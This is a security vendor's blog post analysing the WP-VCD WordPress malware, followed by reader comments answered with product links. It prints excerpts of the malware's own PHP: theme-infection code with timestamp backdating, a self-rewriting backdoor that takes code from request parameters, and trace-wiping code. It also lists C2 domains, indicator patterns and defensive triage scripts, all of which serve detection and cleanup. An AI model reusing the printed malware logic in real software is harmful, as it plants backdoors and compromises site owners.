How You Can Remove WP-VCD Using Astra’s One-Click Malware Scanner

Updated on: May 4, 2020

Is your website suddenly showing any of the following symptoms?

  • A lot of malicious pop-ups
  • Redirects to unsolicited websites
  • Spam URLs appearing on your pages
  • Slowdowns caused by high CPU usage (someone may be stealing your resources)
  • Website suspended by the host

If so, there is a high chance that your site is infected with WP-VCD malware.

The WP-VCD malware gains a foothold on your site by exploiting vulnerabilities in outdated plugins and themes. In most WP-VCD cases, site owners infect themselves by installing a free (nulled) plugin or theme from an unauthorized source; in other cases the infection spreads from already infected sites.

It has been a while since WP-VCD malware first appeared, but the campaign is still going on in full force. In fact, most infections of WordPress sites result from WP-VCD malware.

As the graph below shows, as many as 56% of WordPress website infections come from infected plugins, and infected themes account for another 6% of the total.

What is WordPress WP-VCD Malware?

WP-VCD malware comes pre-installed with pirated versions of paid themes and plugins. These nulled (pirated) themes and plugins contain malicious scripts that are deployed the moment you install them.

After gaining a foothold on your website through a nulled theme, it goes on to infect every other theme on the site. On a shared server, the malware then propagates to every unprotected site hosted on that server.

Preventing WP-VCD infections is difficult because site owners install the malware voluntarily. The exceptionally good SEO of the sites distributing these nulled themes and plugins makes the situation worse.

If you search for “Free [plugin name] download”, it is almost certain that the top results will be sites distributing WP-VCD malware. This often traps web developers and designers into installing the malware.

An example of the WP-VCD malicious script is below:

// Per-site hash that the dropper substitutes for the {$PASSWORD} placeholder in its
// base64-encoded payload ($install_code is assigned earlier in the dropper).
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}', $install_hash, base64_decode($install_code));

$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';

$ping = true;
$ping2 = false;
// Walk every theme directory, whether the theme is active or not.
if ($list = scandir($themes)) {
    foreach ($list as $_) {
        if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
            // Remember the old timestamp so the modified file can be backdated afterwards.
            $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');

            if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
                // 'WP_V_CD' is the infection marker: themes that already carry it are skipped.
                if (strpos($content, 'WP_V_CD') === false) {
                    // Prepend the payload to the theme's functions.php ...
                    $content = $install_code . $content;
                    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
                    // ... and restore the old modification time so the change is less obvious
                    // (touch() resets mtime only; the filesystem still updates ctime).
                    touch($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $time);
                } else {
                    $ping = false;
                }
            }
        } else {
            // No functions.php at this level: descend one directory further.
            $list2 = scandir($themes . DIRECTORY_SEPARATOR . $_);
            foreach ($list2 as $_2) {
                if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
                    $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');

                    if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
                        if (strpos($content, 'WP_V_CD') === false) {
                            // Same injection and timestamp restore as above.
                            $content = $install_code . $content;
                            @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
                            touch($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $time);
                            $ping2 = true;
                        }
                        // ... (excerpt truncated)

What are the symptoms of WP-VCD malware?

  1. A new WordPress administrator added without your knowledge
  2. Your hosting provider suspended your WordPress account because of the WP-VCD malware attack, to protect other websites
  3. Account suspension by the host due to excessive resource consumption
  4. SEO spam, such as Japanese search results or a pharma attack, showing up in Google Search results
    Screenshot: WP-VCD hacked results in Google

    Related: WordPress spam search results and how to fix them.
  5. Unknown JavaScript code in the source of your website
  6. Pages on your website redirecting to shady websites
  7. Unknown PHP files in the wp-includes folder that do not exist in the WordPress GitHub repository
  8. PHP files in the wp-content/uploads directory and its subdirectories
  9. A malware scanner flags WP-VCD on your website

Screenshot: Astra’s malware scanner flagging WP-VCD

30,000 websites get hacked every single day. Are you next?

Secure your website from malware and hackers using Astra before it is too late.

Why were you infected with WP-VCD malware?

There can be many reasons for the infection. The most common are:

  1. Use of a nulled theme: in many cases the WP-VCD malware comes pre-installed with every theme downloaded from nulled-theme websites
  2. Use of outdated WordPress plugins and themes on your site
  3. No Web Application Firewall (WAF) installed to block hacking attempts

How does WP-VCD malware work?

Suppose you have installed and activated the nulled theme.

The next thing WP-VCD does is create backdoors on your website, usually by adding hidden WordPress admin users.

These accounts are controlled remotely by the WP-VCD operators through a vast command-and-control (C2) infrastructure. The backdoors give the attackers a tight grip on your website, which is how they reinfect it after every partial cleanup.

Some variants of the malicious code have been seen modifying core WordPress files; some also add new files to the /wp-includes directory.

In short, this is what happens in a WP-VCD malware hack:

  1. The WP-VCD malware creates spam URLs on the website (also referred to as URL injection)
  2. The malware creates a backdoor that gives hackers access to your website for extended periods
  3. Hackers exploit vulnerabilities in WordPress plugins and themes; once such a plugin or theme is installed, it uploads the WP-VCD malware onto the vulnerable site
  4. WP-VCD spreads to unprotected sites on the same server and gets a stronger grip

Such a hack could have been avoided with a Web Application Firewall (WAF) and regular malware scanning. It is also essential to monitor WordPress core files, plugins and themes for modifications.

Analysis of what WP-VCD malware does

Deploys malicious scripts

In the functions.php file of your theme, you would see code similar to this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

This line checks whether the deployer script is present and, if so, executes it. In the code above, the file being included is class.theme-modules.php. Depending on where the infection originates (theme or plugin), the malicious script lives in class.theme-modules.php or class.plugin-modules.php respectively.

In the example above, class.theme-modules.php is the file that actually installs the WP-VCD malware into all the other installed themes (enabled or disabled) and creates the other malicious files.

Creates a backdoor

Snippet of the malware code:

<?php

//install_code1
// Silence PHP errors so failures never surface on pages or in logs.
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);

// Base64-encoded PHP payload (the string is truncated in this excerpt).
$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...';
...

// Drop wp-tmp.php ($tmpcontent holds the payload and is assigned in the elided part):
// if wp-includes/wp-tmp.php is absent, write it into the active theme directory,
// and if that fails, into the current working directory.
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
        @file_put_contents('wp-tmp.php', $tmpcontent);
    }
}

As discussed in the earlier section, this code creates a new admin user with a name similar to 100010010. The purpose of this backdoor admin account is to ensure the hacker can still access the website even after you delete the malicious code, so that the attackers can return to your website at a later point in time.

Besides giving the hacker another way into the site, backdoors perform several other functions. Primarily, these backdoors:

  1. Add more backdoors
  2. Get more instructions from hackers

Adds more backdoors

WP-VCD operators can use the backdoors to inject arbitrary new code into the theme’s functions.php file. Here is how:

case 'change_code':
    // Triggered by a request that carries a 'newcode' parameter.
    if (isset($_REQUEST['newcode'])) {
        if (!empty($_REQUEST['newcode'])) {
            if ($file = @file_get_contents(__FILE__)) {
                // Locate the region between the //$start_wp_theme_tmp and //$end_wp_theme_tmp markers ...
                if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
                    // ... replace it with the attacker-supplied code and rewrite this very file.
                    $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                    @file_put_contents(__FILE__, $file);
                    print "true";
                }
            }
        }
    }
    break;

With the change_code feature of an already injected backdoor, the hacker can inject any ‘new code’ into your site.
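The change_code handler above reads its payload from $_REQUEST, so the web server’s access log is one place to look for its use. The script below is an added example, not from this post and not Astra’s code: it greps combined-format access logs for requests that carry a newcode parameter or that hit the wp-vcd.php / wp-tmp.php files named later in this post, and summarises the hits per client IP. The log lines, IP addresses and paths are constructed for the example. One caveat: $_REQUEST also accepts POST bodies and cookies, which never reach the access log, so an empty result does not clear the site; the on-disk checks remain necessary.

```shell
#!/bin/sh
# Added example (not from the article, not Astra's code): flag access-log
# requests that look like use of the change_code backdoor or direct hits on
# WP-VCD dropper files. Assumes combined-format logs on stdin.
# Limitation: only the query string is logged; a 'newcode' sent in a POST
# body is invisible here, so pair this with on-disk scanning.

# Constructed sample log; the IPs and paths are placeholders.
SAMPLE_LOG='203.0.113.5 - - [04/May/2020:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [04/May/2020:10:00:07 +0000] "GET /wp-content/themes/twentytwenty/functions.php?newcode=PLACEHOLDER HTTP/1.1" 200 4 "-" "curl/7.68.0"
198.51.100.2 - - [04/May/2020:10:00:12 +0000] "GET /wp-includes/wp-vcd.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.5 - - [04/May/2020:10:00:20 +0000] "GET /wp-admin/post.php?post=12&action=edit HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
203.0.113.9 - - [04/May/2020:10:00:33 +0000] "GET /wp-content/themes/twentytwenty/wp-tmp.php HTTP/1.1" 200 12 "-" "curl/7.68.0"'

# Request-line patterns worth an alert, anchored inside the quoted request line:
#   newcode=      parameter consumed by the change_code handler
#   /wp-vcd.php   dropper script in wp-includes
#   /wp-tmp.php   backdoor store in wp-includes or a theme directory
WPVCD_REQUEST_RE='"[A-Z]+ [^" ]*(newcode=|/wp-vcd\.php|/wp-tmp\.php)'

# Read log lines on stdin and print the suspicious ones (no match is not an error).
flag_wpvcd_requests() {
    grep -E "$WPVCD_REQUEST_RE" || true
}

# Summarise flagged requests: "<count> <client ip>", most active client first.
wpvcd_hits_by_ip() {
    flag_wpvcd_requests | cut -d' ' -f1 | sort | uniq -c | sort -rn
}

# Usage on a real server: wpvcd_hits_by_ip < /var/log/apache2/access.log
printf '%s\n' "$SAMPLE_LOG" | wpvcd_hits_by_ip
```

On the sample above the summary lists 203.0.113.9 with two hits and 198.51.100.2 with one; the two benign requests are not reported. Treat a hit as a lead: a legitimate request can contain the string `newcode=` too, so confirm against the on-disk state of the theme before acting.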

Gets instructions from hackers

Sometimes hackers inject the URLs of their C2 servers. These URLs are later called to deploy an action across all infected sites in one go. Domains such as www.krilns.com/code.php, krilns.pw and krilns.top have been found doing this on many WP-VCD-infected sites.

Infects other files and sites

The next thing the WP-VCD malware does is spread. It deploys the malicious script into every theme and plugin on your site, then looks for vulnerable sites on the same server and infects them too.

This propagation starts with the deployment of a script at wp-includes/wp-vcd.php. It is followed by a modification of the core file wp-includes/post.php, which ends up executing the code in wp-vcd.php on every page load.

Destroys the trail

As a final step, the WP-VCD malware removes the original signs of infection from the theme or plugin. If you look closely at the following code, you’ll see how preg_replace() is used to remove everything between //install_code and //install_code_end.

if ($file = @file_get_contents(__FILE__)) {
    // Strip the installer block from this file, then any empty <?php ?> pair it leaves behind.
    $file = preg_replace('!//install_code.*//install_code_end!s', '', $file);
    $file = preg_replace('!<\?php\s*\?>!s', '', $file);
    @file_put_contents(__FILE__, $file);
}

How to remove the WP-VCD malware infection

With Astra, you can remove the infection with a click of a button. Simply run a scan with Astra’s malware scanner and remove the infected files right from the dashboard.

If you have not yet tried Astra’s one-click malware removal, you can get it here. To remove WP-VCD manually, read on.

First, search your server for occurrences of the files and strings listed below and examine their contents.

Run a diff of each file’s contents against the corresponding file in the WordPress core GitHub repository or in the theme/plugin directory. You can use either of the following approaches (or both), over SSH or from your IDE.

Approach 1 – Search for files on the server that are usually infected in a WP-VCD hack

  1. wp-includes/wp-vcd.php
  2. wp-includes/wp-tmp.php
  3. wp-content/themes/*/functions.php (all themes installed on the server whether active or not)
  4. class.wp.php
  5. admin.txt
  6. codexc.txt
  7. code1.php
  8. class.theme-modules.php (inside the theme folder)

Approach 2 – Search for string patterns found in infected files

  1. tmpcontentx
  2. function wp_temp_setupx
  3. wp-tmp.php
  4. derna.top/code.php
  5. stripos($tmpcontent, $wp_auth_key)

Files such as wp-vcd.php, wp-tmp.php and class.theme-modules.php can be deleted from the server once every reference to them has been removed from the functions.php files of all themes (active or inactive) and from the core WordPress files in the website root.
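The following shell script is an added example; it is not part of the original post and not Astra’s scanner. It automates the two approaches above, adds to the pattern list the ‘WP_V_CD’ marker that the installer script shown earlier checks before injecting a theme, turns that installer’s touch()-based timestamp restore into a detection heuristic, and implements the diff-against-core step as a checksum manifest comparison. It assumes a POSIX sh with find, grep, stat and sha256sum (or shasum); the manifest format, the class.plugin-modules.php file name and the WP_V_CD string are additions beyond the article’s own lists.

```shell
#!/bin/sh
# WP-VCD triage script, added here as an example (not Astra's scanner).
# Assumes POSIX sh with find, grep, stat and sha256sum (or shasum).
# Checks, in order:
#   1. Approach 1: file names usually present in a WP-VCD infection
#   2. Approach 2: string patterns seen in infected files, plus 'WP_V_CD',
#      the marker the installer looks for before injecting a theme
#   3. the installer's timestamp trick: touch($file, $time) restores the old
#      mtime, but the kernel still updates ctime, so a functions.php whose
#      ctime is newer than its mtime deserves a look
#   4. the diff-against-core idea, as a sha256 manifest comparison

WPVCD_FILES='wp-vcd.php wp-tmp.php class.wp.php admin.txt codexc.txt code1.php class.theme-modules.php class.plugin-modules.php'

# One fixed string per line; grep -F treats each line as a separate pattern.
WPVCD_STRINGS='tmpcontentx
function wp_temp_setupx
wp-tmp.php
derna.top/code.php
stripos($tmpcontent, $wp_auth_key)
WP_V_CD'

# Approach 1: print every file under $1 whose basename is a listed name.
# Matching on basename is deliberately broader than the article's exact paths.
find_known_files() {
    root=$1
    for name in $WPVCD_FILES; do
        find "$root" -type f -name "$name" 2>/dev/null
    done | sort -u
}

# Approach 2: print every .php file under $1 containing at least one indicator.
grep_known_strings() {
    find "$1" -type f -name '*.php' -exec grep -lF "$WPVCD_STRINGS" {} + 2>/dev/null | sort -u
}

# Timestamp heuristic: functions.php files whose ctime is newer than mtime.
# A legitimate chmod/chown moves ctime too, so hits are leads, not proof.
ctime_newer_than_mtime() {
    find "$1" -type f -name functions.php | while IFS= read -r f; do
        if times=$(stat -c '%Z %Y' "$f" 2>/dev/null); then
            :                                   # GNU stat
        else
            times=$(stat -f '%c %m' "$f")       # BSD/macOS stat
        fi
        ctime=${times% *}
        mtime=${times#* }
        if [ "$ctime" -gt "$mtime" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# Core integrity: $2 is a manifest of "sha256  relative/path" lines built from
# a pristine copy of the same WordPress version. Prints paths whose hash differs.
core_integrity_check() {
    root=$1; manifest=$2
    if command -v sha256sum >/dev/null 2>&1; then hasher='sha256sum'; else hasher='shasum -a 256'; fi
    while read -r expected path; do
        actual=$(cd "$root" && $hasher "$path" 2>/dev/null | cut -d' ' -f1)
        if [ "$actual" != "$expected" ]; then
            printf '%s\n' "$path"
        fi
    done < "$manifest"
}

# Run all checks against a WordPress root; the manifest argument is optional.
wpvcd_triage() {
    root=$1
    echo '== known WP-VCD file names =='; find_known_files "$root"
    echo '== known WP-VCD strings =='; grep_known_strings "$root"
    echo '== functions.php with ctime newer than mtime =='; ctime_newer_than_mtime "$root"
    if [ -n "${2:-}" ]; then
        echo '== core files differing from manifest =='; core_integrity_check "$root" "$2"
    fi
}

# Usage: sh wpvcd_triage.sh /var/www/html [core.sha256]
if [ -n "${1:-}" ]; then
    wpvcd_triage "$1" "${2:-}"
fi
```

Build the manifest from a clean download of the same WordPress version (for example `sha256sum wp-includes/*.php > core.sha256` run inside the pristine tree) and then run `sh wpvcd_triage.sh /var/www/html core.sha256` on the suspect install. Every hit is something to open and diff, not something to delete automatically: a string like wp-tmp.php can legitimately appear in a security plugin’s own signature list, and ctime drifting from mtime also follows an innocent chmod or chown.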

Check out this step-by-step WordPress malware removal blog post for the full process.

How to protect WordPress and stay secure from the backdoor

  1. Create a simple security strategy:
    1. Clean – make sure your website files and database are 100% clean and malware-free
    2. Protect – install a Web Application Firewall (WAF) to block re-infection attempts
    3. Monitor – run regular malware scans to check whether files or the database have been tampered with
  2. Delete unused WordPress themes (even if disabled)
  3. Avoid nulled themes on your website altogether
  4. Keep WordPress core, plugins and themes updated

Here’s a complete video that walks you step by step through securing your WordPress site.

Cleaning websites infected with such malware is not always easy, because once activated, the malware tends to infect other areas of the website too by installing different kinds of malicious code.

Further, this malware also creates a backdoor that gives the attackers complete control of your site. Hence, it is important to have an effective security strategy that thoroughly analyses your website and then completely removes the hack.

Astra

At Astra, we have a team of security experts who daily resolve dozens of web security issues. Our web application firewall ASTRA protects your website 24×7 from XSS, SQL injection, bad bots, malware and 80+ other threats.

Ananda Krishna

Ananda Krishna is the co-founder & CTO of Astra Security, a SaaS suite that secures businesses from cyber threats. He has been acknowledged by the Indian Navy, Microsoft, United Airlines, etc. for finding critical security vulnerabilities in their systems. Winner of the Best Security Product at Global Conference on Cyberspace 2017 (awarded by Narendra Modi, Prime Minister of India) & French Tech Ticket, Paris (awarded by François Hollande, former President of France). At Astra he's building an intelligent security ecosystem: web application firewall (WAF), malware detection & analysis, large-scale SaaS applications, APIs & more. He's actively involved in the cybersecurity community and has shared his knowledge at various forums & invited talks.

Questions? Got something to add? Let’s Talk

Fleta (Guest):

Thank you for this informative read, I have shared it on Twitter.

Aakanchha Keshri (Admin):

We are glad that you found it informative Fleta, and many thanks for sharing this on Twitter.

ahiad hazan (Guest):

Thank you very much for the detailed explanation.

I have a question.

I have cleaned the functions.php file from the snippet and deleted the wp-vcd.php file.
I searched through the SQL for all the string patterns and found nothing.

Does it mean I’m safe?

Aakanchha Keshri (Admin):

Hi Ahiad, what you’ve done so far should remove the malware. We’ve also seen in some cases that wp-includes/wp-tmp.php gets created, which could store the backdoors. Removing these files removes the infection, but the vulnerability would also have to be identified and patched. To harden your WordPress security further you can use this free plugin here – https://wordpress.org/plugins/wp-security-hardening/

DEEPAK RATHOR (Guest):

That’s a really good point. This article is very helpful and informative. Thanks for sharing.

Aakanchha Keshri (Admin):

Thanks Deepak for your appreciative words 🙂 To get regular updates on WordPress security, subscribe to our newsletter.

Oussama (Guest):

Thank you for this useful article, it helped me a lot.

Aakanchha Keshri (Admin):

We are glad that we could be of any help to you Oussama 🙂

Ezekiel (Guest):

Thanks a lot. I am currently experiencing this. At first, I thought my host was just making life a living hell for me, but now I realize. I will surely follow this guide.

Aakanchha Keshri (Admin):

Glad you liked it, go ahead and apply it 🙂

Darron (Guest):

Hi, my WordPress account got suspended. I think it’s because of malware. How can I fix this with my host?

Sai Krishna (Editor):

Thanks for responding to the article. WordPress users may feel devastated. The hosting providers may give multiple reasons for WordPress accounts being suspended. Although in reality, it is often something that triggered the automatic systems. These systems then respond via account suspensions and system generated mail. The end users may feel cheated upon the suspension of their service. For more information visit here: https://www.getastra.com/blog/911/wordpress-account-suspended-because-of-malware-how-to-fix-account-suspension-by-host/

Florus Hachée (Guest):

My WordPress website is showing some strange Japanese content on Google search. Is my website hacked? If yes, how can I solve it?

Sai Krishna (Editor):

Thanks for responding to the article. In a Japanese keyword hack, auto generated Japanese text starts to appear on your site. This particular Blackhat SEO technique hijacks Google search results by displaying Japanese words in the title and description of the infected pages. It happens when different web pages are shown to search engines and normal visitors. For more information on removal visit here: https://www.getastra.com/blog/911/japanese-keyword-hack/

Aubert Sansouci (Guest):

I would like to know more about the pharma attacks that are happening. How can I protect our website from this happening?

Sai Krishna (Editor):

Thanks for responding to the article. WordPress is probably the most popular CMS used to create websites. However, their popularity has made them juicy targets for hackers and SEO spammers. Hackers continuously try to manipulate search indexes to include undeserving content on prominent search positions. For more information on this hack, visit here: https://www.getastra.com/blog/911/pharma-hack-wordpress-and-drupal/

Blais (Guest):

Hello, I have a WordPress site and when I search for my website in Google it is showing some Japanese characters. Is there any way I can get rid of this?

Sai Krishna (Editor):

Thanks for responding to the article and sorry to hear about the spam. When using a Content Management System (CMS) like OpenCart, Magento, Drupal or WordPress you’ll find auto-generated Japanese SEO spam pages. These pages contain affiliate links to stores selling fake brand merchandise. These Japanese products are ‘spamvertised’ to increase revenue and benefit from the outbound links from your store. For more information on hack removal visit here: https://www.getastra.com/blogv2/911/japanese-keyword-hack/

loridan Blanc (Guest):

Do you know how I can fix the redirection hack of WordPress? I have a site that is redirecting to strange websites and I want to fix it myself.

Sai Krishna (Editor):

Thanks for responding to the article. A WordPress malware redirect hack is a common form of attack where the visitors to the infected website are automatically redirected to phishing sites or malicious websites. For more information visit here: https://www.getastra.com/blog/911/wordpress-redirect-hack/

Eugenia Rivière (Guest):

So, I own a WP site and strangely I don’t know how our admin panel got hacked. I would like to know if there’s any way to solve this.

Sai Krishna (Editor):

Thanks for responding to the article. A new type of wp-admin hack has surfaced which adds an unauthorized WordPress admin user and infects the site with a pharma hack. The typical consequences of such a hack include complete website takeover, data theft, compromise of database and SEO hijacking. The WordPress admin is the most crucial part of your website. Getting locked out of the admin would mean losing access to your website. For more info, visit here: https://www.getastra.com/blog/911/fix-wordpress-admin-dashboard-wp-admin-hack/

Fortun Sauvé (Guest):

Good article. So what are the common files that have a high chance of getting hacked? I own a website running on WordPress.

Sai Krishna (Editor):

Thanks for responding to the article. You can go through this article to know more about common files that get hacked and how to protect them: https://www.getastra.com/blog/911/wordpress-files-hacked-wp-config-php-hack/

Fortun Sauvé (Guest):

Recently I noticed that many WordPress sites are getting hacked again and again because of backdoors. What are these and how can I defend myself from this happening?

Sai Krishna (Editor):

Thanks for responding to the article. Hackers are always at play trying to inject WordPress backdoor. There have been multiple plugins over the years used to spread infection. Therefore, the threat could be from anywhere. Later on, it can be a time and resource consuming process to remove WordPress backdoors. For more info, visit here: https://www.getastra.com/blog/911/wordpress-backdoor-hack/

Audric Garceau (Guest):

I would like to opt for a security audit for my WordPress site. Can you provide more details about the audit and pricing?

Sai Krishna (Editor):

Thanks for responding to the article. Sure, you can visit here to know more on our WordPress security audit: https://www.getastra.com/wordpress-vapt#securityAuditFrequencySelection

Fletcher Monty (Guest):

I am an author and I have a blog in which I write articles, and it’s WordPress. I have noticed that my blog is getting redirected to strange websites. How can I solve this?

Sai Krishna (Editor):

Thanks for responding to the article. WordPress redirect hacks have been a menace for such a long time now. It metamorphs itself into new redirect hacks every few weeks. For more info, visit here: https://www.getastra.com/blog/911/adaranth-wp-blog-redirection-hack/

Covillon (Guest):

What is a backdoor shell and how can it help hackers to get access to the website?

Sai Krishna (Editor):

A web shell or backdoor shell is a script written to enable remote access and administration of the server using a GUI. It is a type of malware which is able to pass commands that are directly executed by the operating system. Attackers use these to gain complete access to the server (code execution), its file system & databases. Shell scripts are used by attackers to escalate & maintain persistent access on a vulnerable web application.

Felicienne Marois (Guest):

Can you tell me the features that the Astra firewall comes with? I am looking for a firewall for my website.

Sai Krishna (Editor):

Thanks for responding to the article and also for showing interest in Astra. You don’t have to worry about any malware, credit card hack, SQLi, XSS, SEO spam, comment spam, brute force & 100+ types of threats. This means you can get rid of other security plugins & let Astra take care of it all. You can find more info about features and more here: https://www.getastra.com/features
